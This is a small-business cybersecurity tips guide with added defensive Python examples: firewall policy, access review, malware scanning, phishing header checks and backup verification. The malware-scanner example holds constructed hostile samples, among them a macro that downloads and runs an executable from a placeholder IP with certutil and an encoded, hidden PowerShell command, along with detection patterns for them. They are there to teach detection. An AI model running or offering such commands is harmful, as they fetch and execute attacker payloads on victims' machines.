Small and medium-sized businesses (SMBs), along with their websites and social media accounts, are the #1 target for cybercriminals. Shockingly, 43% of all data breaches target SMBs, and 61% of these businesses in the U.S. and U.K. were hit by cyberattacks last year. These attacks are not random: SMBs often have weaker security because of limited budgets and staff, which makes them easy prey for opportunistic criminals.
Despite this high threat level, 43% of SMBs have no cybersecurity plan in place. The risks are serious: downtime, lost revenue, damaged reputation, and more, with 58% of SMBs reporting sales-impacting business interruptions caused by cyberattacks. With the rise of Artificial Intelligence (AI)-driven threats and easy-to-use hacking tools for sale on the dark web, the need for solid cybersecurity has never been more urgent.
But where do you start? Our Top 10 Cybersecurity Tips are listed below.
Check your business's security against our risk reduction tips and take action where needed. Strengthen your cyber defenses and reduce your risk of becoming the next victim of cybercrime.
Here are your Top 10 Cybersecurity Tips:
- Secure all connections to the internet with a firewall.
- Secure your wireless networks.
- Secure the devices and software you use.
- Control access to your data and services.
- Keep your devices and software up to date (“Patching”).
- Protect against viruses and other malware.
- Address the threat from social engineering and scams.
- Secure and backup your data.
- Improve security awareness.
- Be prepared to respond to security incidents.
1. Secure all connections to the internet with a firewall:
A firewall sits between your computer systems and the internet. Firewalls are a barrier to keep unwanted traffic from the internet and potential external attackers out of your network and systems. Firewalls can be configured to allow the access you and your business need and block anything you don’t want or authorize.
Extra tip: Make sure firewalls are in place to protect your business’s computer systems and networks, wherever they are – including any home networks if you or your employees are undertaking business activities from home.
Your firewall may be one or both of the following:
- A dedicated boundary firewall places a protective buffer around the network. Some routers (such as the device provided by your internet service provider (ISP)) will contain a firewall to provide this boundary protection role. But this can’t be guaranteed – if you can, ask your ISP about your specific model.
- Personal Firewall or Endpoint Protection software will run on each internet-connected device and protect only the system it is running on. Most operating systems have one built-in, but please ensure it is enabled.
Having both types of firewall is recommended, to provide two separate layers of protection for your systems.
Level up your firewall protection:
- Make sure the firewall software is up to date.
- Check that the firewall is not still set up with the default (‘out of the box’) admin username and password.
- Check that the firewall’s administrative interface is inaccessible from the Internet.
  If a business needs to allow firewall administration remotely, restrict it to the people who need it, for example by requiring a VPN connection or allowing only named source addresses, and protect the login with MFA.
- Control the inbound and outbound traffic allowed to communicate into and out of your network. Start from a default-deny position: allow only the services you actually need (and, for outbound traffic, only the destinations and ports your business uses) and block everything else.
- Turn on any additional security features your firewall may have, such as intrusion detection, blocking, and web content filtering.
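The default-deny policy and the "admin interface not reachable from the Internet" check described above, as an added example that is not part of the original post. It is a small first-match rule evaluator written for this article, not the configuration language of any real firewall; the network ranges, the admin address, the rule set and the probing address (a TEST-NET-3 address) are all assumptions, and the "weak" rule set shows the single careless rule that exposes the management interface.

```python
"""Added example (not from the original post): a small first-match packet
policy checker that mirrors the firewall advice above. Addresses, ports
and the rule set are assumptions chosen for the demonstration."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Rule:
    action: str           # "allow" or "deny"
    iface: str            # interface the packet arrives on: "wan" or "lan"
    src: str              # CIDR the source address must fall in
    dst: str              # CIDR the destination address must fall in
    dport: Optional[int]  # destination port, or None for any port
    note: str = ""


ANY = "0.0.0.0/0"
LAN = "192.168.1.0/24"            # assumed office network
FW_ADMIN = "192.168.1.1/32"       # assumed firewall/router admin address
WEB_SERVER = "192.168.1.10/32"    # assumed public-facing web server
DEFAULT_POLICY = "deny"           # anything not explicitly allowed is dropped

GOOD_RULES = [
    Rule("allow", "lan", LAN, FW_ADMIN, 443, "admin UI from the LAN only"),
    Rule("deny",  "wan", ANY, FW_ADMIN, None, "admin UI never from the Internet"),
    Rule("allow", "wan", ANY, WEB_SERVER, 443, "the one inbound service we publish"),
    Rule("allow", "lan", LAN, ANY, 443, "outbound HTTPS"),
    Rule("allow", "lan", LAN, ANY, 53, "outbound DNS"),
    Rule("allow", "lan", LAN, ANY, 587, "outbound mail submission"),
]

# The same policy with one careless addition: remote administration open to the world.
WEAK_RULES = [Rule("allow", "wan", ANY, FW_ADMIN, 443, "remote admin (no source restriction)")] + GOOD_RULES


def evaluate(rules, iface, src, dst, dport):
    """Return the action for a packet; the first matching rule wins and
    anything unmatched falls through to DEFAULT_POLICY."""
    s, d = ip_address(src), ip_address(dst)
    for r in rules:
        if (r.iface == iface and s in ip_network(r.src) and d in ip_network(r.dst)
                and (r.dport is None or r.dport == dport)):
            return r.action
    return DEFAULT_POLICY


ADMIN_PORTS = (22, 23, 80, 443, 8080, 8443)


def admin_ports_open_to_internet(rules, probe_src="203.0.113.7"):
    """Simulate an external scan (TEST-NET-3 address, an assumption) against
    the admin address on common management ports; any 'allow' is a finding."""
    admin_ip = FW_ADMIN.split("/")[0]
    return [p for p in ADMIN_PORTS
            if evaluate(rules, "wan", probe_src, admin_ip, p) == "allow"]


if __name__ == "__main__":
    print("admin ports exposed (good policy):", admin_ports_open_to_internet(GOOD_RULES))
    print("admin ports exposed (weak policy):", admin_ports_open_to_internet(WEAK_RULES))
    print("LAN host to 8.8.8.8:4444 (a typical reverse-shell port):",
          evaluate(GOOD_RULES, "lan", "192.168.1.20", "8.8.8.8", 4444))
```

The outbound rules matter as much as the inbound ones: with the good policy a compromised LAN machine can still reach the web and mail, but a connection to an arbitrary port on an Internet host is dropped, which is exactly the egress control the tip asks for.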
2. Secure your wireless networks:
Your business network—or the home network you or your employees use to perform business-related activities—may be a wired network, where the computer systems are physically connected to the network (using Ethernet or Cat-5 cable), or it could be a wireless network (a ‘Wi-Fi’ network).
If the network is wireless, to help you to secure the Wi-Fi network, check that:
- The wireless router and/or access point’s software is current.
- The wireless router and/or access point is not set up with the default (‘out of the box’) admin username and password.
- The wireless network uses WPA2 with AES (CCMP) encryption, or WPA3 where all your devices support it, to protect the traffic between your computers or mobile devices and the access point. Do not use WEP or WPA with TKIP; both are obsolete and easily attacked.
- The wireless network is password protected. Anyone wanting to join the network must know its access code or password.
- The Wi-Fi password is long and hard to guess. Once an attacker has captured a device joining the network (the WPA2 handshake), password guessing runs offline on their own hardware with no lockout, so length is what makes it impractical: use a passphrase of several unrelated words or 20 or more characters rather than a short "complex" one.
- The wireless network’s access code or password is only given to people you know and trust.
3. Secure the devices and software you use:
The computers and devices you or your employees use to do your job may be company-owned or personal devices. More and more employees use personal devices to conduct business, such as checking inventory and shipment status. This can quickly expand to working with your business applications and systems, making or taking orders and payments, or accessing, editing, or storing company-sensitive, customer, or personal data. It is important to ensure that those devices, and the software or apps installed on them, are secure.
To check that your devices and software are configured securely:
- Remove any unnecessary software and applications.
- Disable any functions or services that aren't needed, both in the operating system and in each application's own settings.
- Turn on the additional security features the device or application offers, for example automatic screen lock, remote wipe for mobile devices, and sandboxing or protected-view modes where available.
- Avoid using jailbroken or rooted mobile devices for business purposes.
It’s also essential to make sure your devices encrypt the data they hold:
- On an iPhone or iPad, data is encrypted as soon as a device passcode is set (Touch ID and Face ID require a passcode and simply unlock it).
- On Windows, the Home edition offers Device Encryption on hardware that meets its requirements (check Settings > Privacy & security > Device encryption on Windows 11); full BitLocker, with management options such as recovery-key escrow, requires Pro, Enterprise or Education. On either, running manage-bde -status in an administrator command prompt shows whether the system drive is protected.
- Android devices that shipped with a recent version of Android encrypt storage by default, but older or cheaper devices may not, so check Settings > Security on every device used for work.
- The data on Mac computers can be encrypted using the built-in FileVault disk encryption feature; confirm it is turned on in System Settings > Privacy & Security.
Finally, make sure only authorized people can get access to and use your computers and devices:
- Remove or change any default usernames and passwords.
- Make sure a login is needed to gain access to devices.
- Make sure solid passwords or PINs are being used.
- Lastly, use Multi-Factor Authentication (MFA) wherever it is offered, so that a stolen password alone is not enough to log in; prefer an authenticator app or hardware key over SMS codes where you have the choice.
4. Control access to your data and services:
You and your employees need access to computer systems and devices, networks, applications, and information to operate your business and support your customers. However, the impact of a data breach, an account compromise, or account misuse (even accidental) is greater if you and your users access those networks, systems, and information with more access rights and privileges than the job needs.
Check that user accounts don’t have any unnecessary access rights or system privileges:
- Do user accounts only give access to the systems and data the user needs to be able to do their job?
- Is the user's level of privilege on the systems or to the data appropriate to their job?
  For example, warehouse staff who pick and pack your online orders may need to access your order management system to view delivery details, but they don't need the privileges to view pricing or payment details or to edit customer records.
- Users' access rights to system settings, software, applications, online services and data should be limited to what they need for their current jobs, and reviewed whenever someone changes role or leaves.
- Users' accounts for day-to-day use should not have administrative privileges on the local computer; give administrators a separate account for administrative tasks and use the ordinary account for email and browsing.
- If you use your home computer for business purposes, check the rights and privileges of the user account you usually log in with.
- Enable logging or audit trails on your systems and applications if they are not already enabled, and keep copies of the logs somewhere an attacker who compromises the system can't simply delete them.
- Monitor user activity, especially the accounts of users working from home and those with additional privileges: failed-login bursts, logins at unusual hours or from unexpected locations, and privileged accounts used from outside the network are the signals worth alerting on.
- Follow up on any anomalies.
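The access review described above, as an added example that is not part of the original post. It compares what each account actually holds against a role-to-entitlement matrix and flags excess rights, day-to-day accounts with local admin, and accounts without MFA. The role model, the entitlement names and the sample accounts (including the warehouse user from the text) are constructed for the demonstration; in practice the grants would be exported from your order system, identity provider or file server.

```python
"""Added example (not from the original post): an access-review script that
checks each account's actual grants against what its role should have.
The role model, entitlement names and accounts are constructed for the demo."""
from dataclasses import dataclass

# Assumed role-to-entitlement matrix: the most any account in that role should hold.
ROLE_ENTITLEMENTS = {
    "warehouse": {"orders:read", "delivery:read"},
    "sales":     {"orders:read", "orders:write", "customers:read", "customers:write", "pricing:read"},
    "finance":   {"orders:read", "payments:read", "payments:write", "pricing:read", "pricing:write"},
    "it_admin":  {"system:admin"},
}


@dataclass
class Account:
    user: str
    role: str
    grants: set
    local_admin: bool = False   # does the day-to-day login have admin rights on the PC?
    mfa: bool = False


def audit(accounts):
    """Return (user, finding, detail) tuples for every deviation from least privilege."""
    findings = []
    for a in accounts:
        allowed = ROLE_ENTITLEMENTS.get(a.role)
        if allowed is None:
            findings.append((a.user, "unknown role", a.role))
            continue
        excess = sorted(a.grants - allowed)
        if excess:
            findings.append((a.user, "excess privilege", ", ".join(excess)))
        if a.local_admin and a.role != "it_admin":
            findings.append((a.user, "local admin on daily account", ""))
        if not a.mfa:
            findings.append((a.user, "MFA not enabled", ""))
    return findings


def who_can(accounts, entitlement):
    """Reverse lookup: which users hold a given entitlement (useful when reviewing
    sensitive rights such as payments:write)."""
    return sorted(a.user for a in accounts if entitlement in a.grants)


# Constructed sample: alice is the warehouse picker from the text who has quietly
# accumulated rights she doesn't need; dave's role is not in the matrix at all.
SAMPLE_ACCOUNTS = [
    Account("alice", "warehouse", {"orders:read", "delivery:read", "pricing:read", "customers:write"},
            local_admin=True, mfa=False),
    Account("bob", "finance", {"orders:read", "payments:read", "payments:write"}, mfa=True),
    Account("carol", "it_admin", {"system:admin"}, local_admin=True, mfa=True),
    Account("dave", "marketing", {"customers:read"}, mfa=True),
]

if __name__ == "__main__":
    for user, finding, detail in audit(SAMPLE_ACCOUNTS):
        print(f"{user:8} {finding:30} {detail}")
    print("payments:write held by:", who_can(SAMPLE_ACCOUNTS, "payments:write"))
```

An "unknown role" finding is deliberately treated as a problem rather than ignored: an account whose role nobody has defined is one nobody is reviewing.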
5. Keep your devices and software up to date (“Patching”):
Cybercriminals, as well as legitimate security researchers ("white-hat hackers"), are continually searching for weaknesses (vulnerabilities) in firewalls and network devices (such as your wireless access points), operating systems, applications, security protocols, and application code.
Cybercriminals look for vulnerabilities that give them new ways to break into your systems and gain unauthorized access to data. White-hat hackers work for the greater good, identifying new weaknesses and notifying the vendors or developers so that fixes (security patches) can be developed and released to users.
The role of business and personal users of the affected systems is to install those security updates before cybercriminals work out how to exploit the weaknesses. Attacks on unpatched systems can make them unusable, disrupt business and personal activities, or expose sensitive company information, personal data, or payment card details to fraud. Patching the technologies you and your business rely on is one of the most effective things you can do to protect your business from attacks and data breaches: close known weaknesses before attackers find and exploit them.
- Take steps to ensure that all the technology and software you and your business use are current, including the firmware on routers, access points, printers and phones, which are easy to forget.
- Recognize that patching your systems may not be as simple as it sounds: you need an inventory of what you run, some updates require a restart or break older software, and someone has to own the task. Test important updates where you can, but don't let testing delay security fixes for long.
- Use software from trusted sources that is licensed and supported by the vendor; software that is no longer supported will not receive security patches and should be replaced.
- If available, enable automatic updating of your devices' operating systems and applications.
- Where automatic updating is not possible, ensure security updates are installed as soon as possible after they become available, prioritizing fixes for vulnerabilities that are already being exploited.
6. Protect against viruses and other malware:
Malicious software (also known as ‘malware’) is software or web content that can cause harm to your business, to your customers, or others. Malware is an umbrella term that refers to software intentionally designed to cause damage and includes viruses, Trojans, worms, ransomware, spyware, adware, and rootkits. Malware may be unknowingly downloaded and/or installed online through web browsing or email. It may also be installed when connecting removable devices such as CDs and DVDs, USB memory sticks and hard drives, and mobile devices to your systems.
Malware can give cybercriminals access to your systems, lock you out of your files and data, and hold your computer and information for ransom. Some malware can remain hidden on your computer while giving cybercriminals remote control or the ability to track the keys tapped on your keyboard. Other malware infections make your computer part of a botnet controlled by cybercriminals that can be used, without your knowledge, for malicious purposes such as assisting in distributed denial-of-service (DDoS) attacks against other businesses or sending out millions of spam emails.
Protect all your servers, computers, and devices from malware threats by installing anti-virus or anti-malware software:
- Windows has built-in virus and threat protection and can be complemented with other protections such as managed detection and response.
- Apple's control of the iPhone and iPad platform (app sandboxing and App Store review) blocks most of the commodity malware techniques cybercriminals use, but not all of them, and jailbroken devices can install apps not vetted by Apple. Adware and spyware still threaten iPads and iPhones, a phishing attack can still scam you, and iOS security updates should be installed promptly.
- Check whether your anti-virus or anti-malware software provides both signature-based and heuristic scanning. Signature scanning matches files against a database of known malware; a heuristic scanner looks for suspicious characteristics and behaviour (for example an executable hiding behind a document extension, or an Office macro that launches a shell), so it can catch new variants before the vendor publishes a definition update, at the cost of some false positives.
- Make sure your anti-virus or anti-malware software comes from a reputable vendor. Fake "free antivirus" downloads from unknown publishers are themselves a common way malware gets installed.
- Make sure anti-virus / anti-malware software is always running on your systems, is kept up to date automatically, and has real-time / on-access protection enabled.
- Make sure to schedule regular full scans of each of your devices, e.g., weekly, to detect malicious software that may have gotten past your protection measures.
- Avoid using the computers and mobile devices you run your business from for non-business purposes.
- Make sure users cannot disable or alter the anti-virus / anti-malware software on your systems.
- If endpoint protection software is not installed on your devices, consider installing it for extra protection.
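The difference between signature and heuristic scanning, as an added example that is not part of the original post. It is a toy scanner written for this article, not the engine of any product: the "signature database" holds the SHA-256 of one constructed sample, the heuristic rules score a handful of traits real malware commonly shows, and all five sample files are constructed (none is real malware). The point it makes is that the signature catches the known dropper exactly and nothing else, while the heuristics catch the renamed variant and the macro document but correctly leave a merely high-entropy file alone.

```python
"""Added example (not from the original post): a toy file scanner that
combines signature matching (exact SHA-256 of known samples) with a few
heuristic rules, to show why each catches what the other misses. The
'signature database' and all sample files are constructed for the demo."""
import hashlib
import math
import re
from collections import Counter

SUSPICIOUS_THRESHOLD = 3   # heuristic score at or above this is reported


def shannon_entropy(data):
    """Bits per byte; random, compressed or encrypted data approaches 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def heuristic_score(name, data):
    """Score a file on traits that malware commonly shows; returns (score, reasons)."""
    score, reasons = 0, []
    lname = name.lower()
    text = data.decode("latin-1")   # byte-preserving view so regexes work on binaries
    if re.search(r"\.(pdf|docx?|xlsx?|jpe?g|png)\.(exe|scr|com|bat|js|vbs|ps1)$", lname):
        score += 3
        reasons.append("document extension hiding an executable one")
    if data[:2] == b"MZ" and not lname.endswith((".exe", ".dll", ".sys", ".scr")):
        score += 3
        reasons.append("Windows executable header with a non-executable extension")
    if re.search(r"powershell.*?(-enc\w*|frombase64string)", text, re.I | re.S):
        score += 2
        reasons.append("encoded PowerShell command line")
    if (re.search(r"\b(AutoOpen|Document_Open|Workbook_Open)\b", text)
            and re.search(r"CreateObject|WScript\.Shell|Shell\(", text)):
        score += 3
        reasons.append("auto-running Office macro that launches a process")
    if len(data) > 256 and shannon_entropy(data) > 7.2:
        score += 1   # weak on its own: installers and archives look like this too
        reasons.append("high entropy (packed or encrypted payload)")
    return score, reasons


def scan(name, data, signatures):
    """Signature check first (cheap, exact), then heuristics for unknown files."""
    digest = hashlib.sha256(data).hexdigest()
    if digest in signatures:
        return {"verdict": "malicious", "method": "signature", "score": None, "reasons": [digest]}
    score, reasons = heuristic_score(name, data)
    verdict = "suspicious" if score >= SUSPICIOUS_THRESHOLD else "clean"
    return {"verdict": verdict, "method": "heuristic", "score": score, "reasons": reasons}


# Constructed samples (none of these are real malware).
KNOWN_DROPPER = b"MZ" + b"\x00" * 62 + b"constructed sample of a dropper seen last month"
NEW_VARIANT = (b"MZ" + b"\x90" * 40 +
               b"cmd /c powershell -NoP -W Hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBi")
MACRO_DOC = (b'Sub AutoOpen()\n'
             b'  Set sh = CreateObject("WScript.Shell")\n'
             b'  sh.Run "cmd /c certutil -urlcache -f http://198.51.100.9/x.exe %TEMP%\\x.exe"\n'
             b'End Sub\n')
PACKED_UNKNOWN = b"MZ" + bytes(range(256)) * 4       # high entropy but nothing else odd
CLEAN_NOTE = b"Meeting notes: review the Q3 order forecast on Monday.\n"

# Pretend the vendor's definition update contains the hash of KNOWN_DROPPER.
SIGNATURES = {hashlib.sha256(KNOWN_DROPPER).hexdigest()}

if __name__ == "__main__":
    for fname, blob in [("dropper.exe", KNOWN_DROPPER), ("invoice.pdf.exe", NEW_VARIANT),
                        ("quote.docm", MACRO_DOC), ("setup.exe", PACKED_UNKNOWN),
                        ("notes.txt", CLEAN_NOTE)]:
        print(fname, scan(fname, blob, SIGNATURES))
```

Run the known dropper through scan() with an empty signature set and it comes back clean: it has no heuristic tells at all, which is why a product needs both mechanisms and why definition updates still matter.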
7. Address the threat from social engineering and scams:
Social engineering is manipulating a person to divulge confidential information or to carry out actions. Types of social engineering include:
Phishing: scammers send emails purporting to be from a legitimate sender, often from a well-known brand or authority you trust. The scammer aims to trick the recipient into clicking a link that installs malware or asks them to share confidential details (like login credentials or financial information).
Shared Document Phishing: the scammers send emails that appear to come from file-sharing sites like Dropbox or Google Drive, alerting the recipient that a document has been shared with them. The link in these emails is to a fake login page that mimics the real file-sharing site’s login page to steal users' account credentials as they log in.
Spear Phishing: This is a more tailored approach where the perpetrator targets a specific individual or business. For example, information about the person or business on LinkedIn or the company website can trick the recipient into thinking they are connected with the sender, making them more likely to click a link or attachment in the email.
Whaling: Whaling emails impersonate a real company executive to persuade the recipient to transfer money or send sensitive information to the attacker. These attacks usually come from a registered "look-alike" domain that is very close to the one being impersonated (a swapped or substituted letter, an added word, or the same name under a different top-level domain). Because the attacker genuinely owns that domain, the email can pass SPF and DMARC checks, so the look-alike has to be spotted by people or by filters that compare sender domains against your own. Often, these emails are expressed as an emergency, stating that the requested action is urgently needed and highlighting the consequences of delay, all to discourage the recipient from pausing to verify the request or seek authorization.
Business email compromise (BEC) attacks: also known as cyber-enabled financial fraud. BEC attacks involve fraud and deception, usually targeting employees with access to company finance processes, who are duped into transferring funds to bank accounts that they think are legitimate, but which instead are accounts controlled by the criminal.
Scareware: the victim is led to believe that their computer or device is infected with malware or has downloaded illegal content. The scammers display frightening pop-ups on the victim's screen, such as a fake virus alert, and then offer a solution, which is often the installation of actual malware or a call to a fake "support" line.
What steps can you take to protect your business and employees from social engineering?
- Define your Acceptable Usage Policies and ensure your employees understand them. These policies help protect your business.
- Educate your employees – at all levels of the company – as to how they could fall victim to a social engineering attack.
  Make sure you and your employees know what to look out for in social engineering emails.
- Report all attacks:
  - Encourage your employees to tell you (or your IT Security team) if they think they have fallen victim to social engineering.
  - Do not punish them if they get caught out; it discourages reporting in the future.
- Use the technical capabilities of your email system to enhance staff awareness and help them spot potential attacks: tag messages from outside the company with an external-sender banner, publish SPF, DKIM and DMARC records for your domain so that mail forging your own domain is rejected, and enable link and attachment scanning where your provider offers it.
- Implement multi-factor authentication for business webmail.
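The checks that the whaling description and the "technical capabilities of your email system" bullet point at, as an added example that is not part of the original post. The code is written for this article and is not any mail provider's filter: it reads a handful of headers and flags a look-alike sender domain (after folding common substitutions such as rn for m and 0 for o), a display name that claims to be an executive but uses a different address, a Reply-To that points elsewhere, a DMARC failure, and urgent or payment-related wording. The company domain, the executive directory and the four sample messages are constructed; note that the whaling sample passes SPF and DMARC because the attacker owns the look-alike domain.

```python
"""Added example (not from the original post): header checks that flag the
whaling and BEC patterns described above. The company domain, the executive
directory and the sample messages are constructed for the demo; the checks
are heuristics, not a substitute for your mail provider's filtering."""
import re
from email.utils import parseaddr

TRUSTED_DOMAINS = {"acme-corp.example"}                     # assumed: your own domains
EXECUTIVES = {"jane doe": "jane.doe@acme-corp.example"}     # assumed staff directory
URGENCY = re.compile(r"\b(urgent|immediately|asap|wire|overdue|final notice)\b", re.I)
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "|": "l"})


def normalize(domain):
    """Fold common look-alike substitutions so 'acrne-c0rp' compares as 'acme-corp'."""
    return domain.lower().translate(HOMOGLYPHS).replace("rn", "m").replace("vv", "w")


def levenshtein(a, b):
    """Edit distance; small distances between domains are a classic typosquat sign."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain):
    """Return the trusted domain this sender domain imitates, or None."""
    if domain in TRUSTED_DOMAINS:
        return None
    n = normalize(domain)
    for trusted in TRUSTED_DOMAINS:
        brand = trusted.split(".")[0]
        if levenshtein(n, trusted) <= 2 or brand in n:
            return trusted
    return None


def domain_of(address):
    return address.rpartition("@")[2].lower()


def analyze(msg):
    """msg is a dict of header name -> value; returns a list of warning strings."""
    flags = []
    name, addr = parseaddr(msg.get("From", ""))
    from_dom = domain_of(addr)
    imitated = lookalike_of(from_dom)
    if imitated:
        flags.append(f"sender domain {from_dom} looks like {imitated}")
    expected = EXECUTIVES.get(name.strip().lower())
    if expected and addr.lower() != expected:
        flags.append(f"display name '{name}' but address is not {expected}")
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if reply_to and domain_of(reply_to) != from_dom:
        flags.append("Reply-To points at a different domain")
    if re.search(r"\bdmarc=fail\b", msg.get("Authentication-Results", ""), re.I):
        flags.append("DMARC failed (message not authorised by the From domain)")
    if URGENCY.search(msg.get("Subject", "")):
        flags.append("urgent or payment-related language in subject")
    if from_dom not in TRUSTED_DOMAINS:
        flags.append("external sender")   # the banner your mail system should add
    return flags


# Constructed messages. The whaling one passes SPF/DMARC: the attacker owns
# the look-alike domain, so authentication alone would not catch it.
WHALING = {
    "From": "Jane Doe <jane.doe@acrne-corp.example>",
    "Reply-To": "ceo-office@mail-relay.example",
    "Subject": "URGENT wire transfer before 5pm",
    "Authentication-Results": "mx.acme-corp.example; spf=pass smtp.mailfrom=acrne-corp.example; dmarc=pass",
}
SPOOFED = {
    "From": "Jane Doe <jane.doe@acme-corp.example>",
    "Subject": "Quick favour",
    "Authentication-Results": "mx.acme-corp.example; spf=fail smtp.mailfrom=acme-corp.example; dmarc=fail (p=reject)",
}
INTERNAL = {"From": "Jane Doe <jane.doe@acme-corp.example>", "Subject": "Q3 planning",
            "Authentication-Results": "mx.acme-corp.example; dmarc=pass"}
SUPPLIER = {"From": "Accounts <ar@supplier.example>", "Subject": "Invoice 1042 attached"}

if __name__ == "__main__":
    for label, m in [("whaling", WHALING), ("spoofed", SPOOFED),
                     ("internal", INTERNAL), ("supplier", SUPPLIER)]:
        print(label, analyze(m))
```

The two impersonation routes show up differently: the spoofed message (forged From on your real domain) is caught by DMARC, while the whaling message is caught only by the look-alike, display-name and Reply-To checks. A legitimate supplier gets nothing more than the external-sender banner, which is the level of noise staff can live with.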
8. Secure and backup your data:
Imagine how you would operate without access to the data your business relies on, such as customer details, contacts, emails, quotes and orders, product information, etc. Regardless of size, all businesses should take regular backups of their critical data and ensure that these backups are recent and can be restored. By doing this, you ensure your business can still function after a flood, fire, physical damage, or theft. Furthermore, if you have backups you can quickly recover from, a ransomware attack can't hold your data hostage (attackers may still threaten to publish data they copied before encrypting it, which is why access control and encryption matter as well).
Backup your electronic data:
- Understand what data needs to be backed up.
  What information does your business create, receive, retain, etc., that is essential to your operations? Do you know where that data is? It could be files and folders on your and your employees' computers or mobile devices, your network, or your applications and systems.
- Take regular backups of all that important data, making sure they are recent and can be restored.
- Keep the backup separate from the computer or system holding the original copy, and keep at least one copy offline or otherwise unreachable from your network (a disconnected drive, or cloud storage with versioning or immutability), so that ransomware that encrypts the live system can't encrypt the backup too.
- Make sure access to data backups is restricted.
- Regularly check the backups and your ability to restore data from those backups.
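The backup cycle those bullets describe (back up, keep the copy separate, check it, prove it restores), as an added example that is not part of the original post. The script is written for this article, not taken from any backup product: it archives a source folder into a location standing in for the separate backup drive, writes a manifest of per-file and whole-archive SHA-256 hashes, verifies the archive against the manifest, and then restores into scratch space and compares every file. The directory layout and the sample files are constructed inside a temporary directory; the final step corrupts one byte of the archive to show the integrity check catching it.

```python
"""Added example (not from the original post): make a backup, record a
checksum manifest, verify it, and prove it restores. Paths and the sample
files are constructed inside a temporary directory for the demo."""
import hashlib
import json
import tarfile
import tempfile
from pathlib import Path


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def make_backup(src, dest_dir):
    """Archive every file under src into dest_dir (which should be a separate
    drive or host) and write a manifest of per-file and whole-archive hashes."""
    src, dest_dir = Path(src), Path(dest_dir)
    archive = dest_dir / "backup.tar.gz"
    files = {}
    with tarfile.open(str(archive), "w:gz") as tar:
        for f in sorted(p for p in src.rglob("*") if p.is_file()):
            rel = f.relative_to(src).as_posix()
            files[rel] = sha256_file(f)
            tar.add(str(f), arcname=rel)
    manifest = dest_dir / "backup.manifest.json"
    manifest.write_text(json.dumps({"archive_sha256": sha256_file(archive), "files": files}, indent=2))
    return archive, manifest


def verify_backup(archive, manifest):
    """Cheap integrity check: has the archive changed since it was written?"""
    expected = json.loads(Path(manifest).read_text())["archive_sha256"]
    return sha256_file(archive) == expected


def restore_test(archive, manifest):
    """The check that matters: restore to scratch space and compare every file."""
    files = json.loads(Path(manifest).read_text())["files"]
    with tempfile.TemporaryDirectory() as scratch:
        root = Path(scratch).resolve()
        with tarfile.open(str(archive), "r:gz") as tar:
            for member in tar.getmembers():
                if not member.isfile():
                    continue
                target = (root / member.name).resolve()
                if root not in target.parents:      # refuse entries that escape the restore dir
                    return False
                target.parent.mkdir(parents=True, exist_ok=True)
                target.write_bytes(tar.extractfile(member).read())
        return all((root / rel).is_file() and sha256_file(root / rel) == digest
                   for rel, digest in files.items())


def demo():
    """Run the whole cycle on constructed data, then corrupt the archive and re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        tmp = Path(tmp)
        src = tmp / "live_data"
        (src / "orders").mkdir(parents=True)
        (src / "customers.csv").write_text("id,name\n1,Example Ltd\n")
        (src / "orders" / "1001.json").write_text('{"id": 1001, "total": 240.00}')
        dest = tmp / "backup_drive"          # stands in for the separate backup location
        dest.mkdir()
        archive, manifest = make_backup(src, dest)
        results = {"verified": verify_backup(archive, manifest),
                   "restore_ok": restore_test(archive, manifest)}
        damaged = bytearray(archive.read_bytes())
        damaged[-1] ^= 0xFF                  # simulate bit rot or tampering
        archive.write_bytes(bytes(damaged))
        results["tamper_detected"] = not verify_backup(archive, manifest)
        return results


if __name__ == "__main__":
    print(demo())
```

Store the manifest with the backup but also somewhere the backup host cannot modify, otherwise an attacker who can tamper with the archive can rewrite the hashes to match. The restore test deliberately refuses archive entries whose path would land outside the scratch directory, a check worth keeping when you restore a backup of unknown provenance.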
Control removable media (including CDs, DVDs, USB sticks, portable hard drives, etc):
- Encrypt removable media.
- Track all removable media used for data storage and backups so you don’t lose them and can recover their contents when needed.
- Ensure you protect your systems and networks from malware that could be introduced via removable media.
9. Improve security awareness:
You must ensure that everyone in your business understands their role in protecting your business (and themselves) from cyberattacks and data breaches.
- Ask your employees to review the security practices in this blog to know how to protect their network, devices, business data, and themselves from security breaches, malicious software, and scammers.
- Make sure everyone knows what is expected for secure and acceptable use of your systems. Remind your employees of your policies on using the Internet, email, social media, removable media, etc.
- Practicing good security is not about your employees being security experts; encourage them to focus on:
- Using their common sense.
- Maintaining a healthy skepticism: especially regarding requests for sensitive information or urgent calls to action.
- Always report their suspicions: the sooner a potential breach is reported, the sooner action can be taken to minimize the impact and warn others.
- Maintain awareness of cyber risks:
- Monitor alerts and security bulletins from reliable sources.
- Review warnings of new scams, new cyber threats, and attack methods.
- Consider the risk to your business and take any necessary steps to improve security measures and protect your business.
10. Be prepared to respond to security incidents:
It is much harder to deal with a data breach or security incident if you haven’t planned ahead of time. Indeed, if you haven’t prepared an Incident Response Plan for your business, not only will that slow down your response and potentially increase the impact of any incident, but it might also mean that you remain unaware when your business is breached.
If you aren't monitoring your systems for security events or asking your employees to report their security concerns (such as realizing they have fallen for a phishing email), you won't be able to contain and recover from a security incident, and you won't know that your existing security measures have already failed and need improving.
At a high level, your business needs to:
- Prepare for a security incident or breach.
- Make sure you and your employees know what types of breaches or incidents might occur so that:
  - You can spot whether there has been an incident or breach (or whether an attack is underway).
  - Your staff know to report any problems or suspicions.
  - You know how to contain, resolve, and recover from any incidents or breaches, and who needs to be contacted (your IT provider, bank, insurer and, where required, regulators and affected customers).
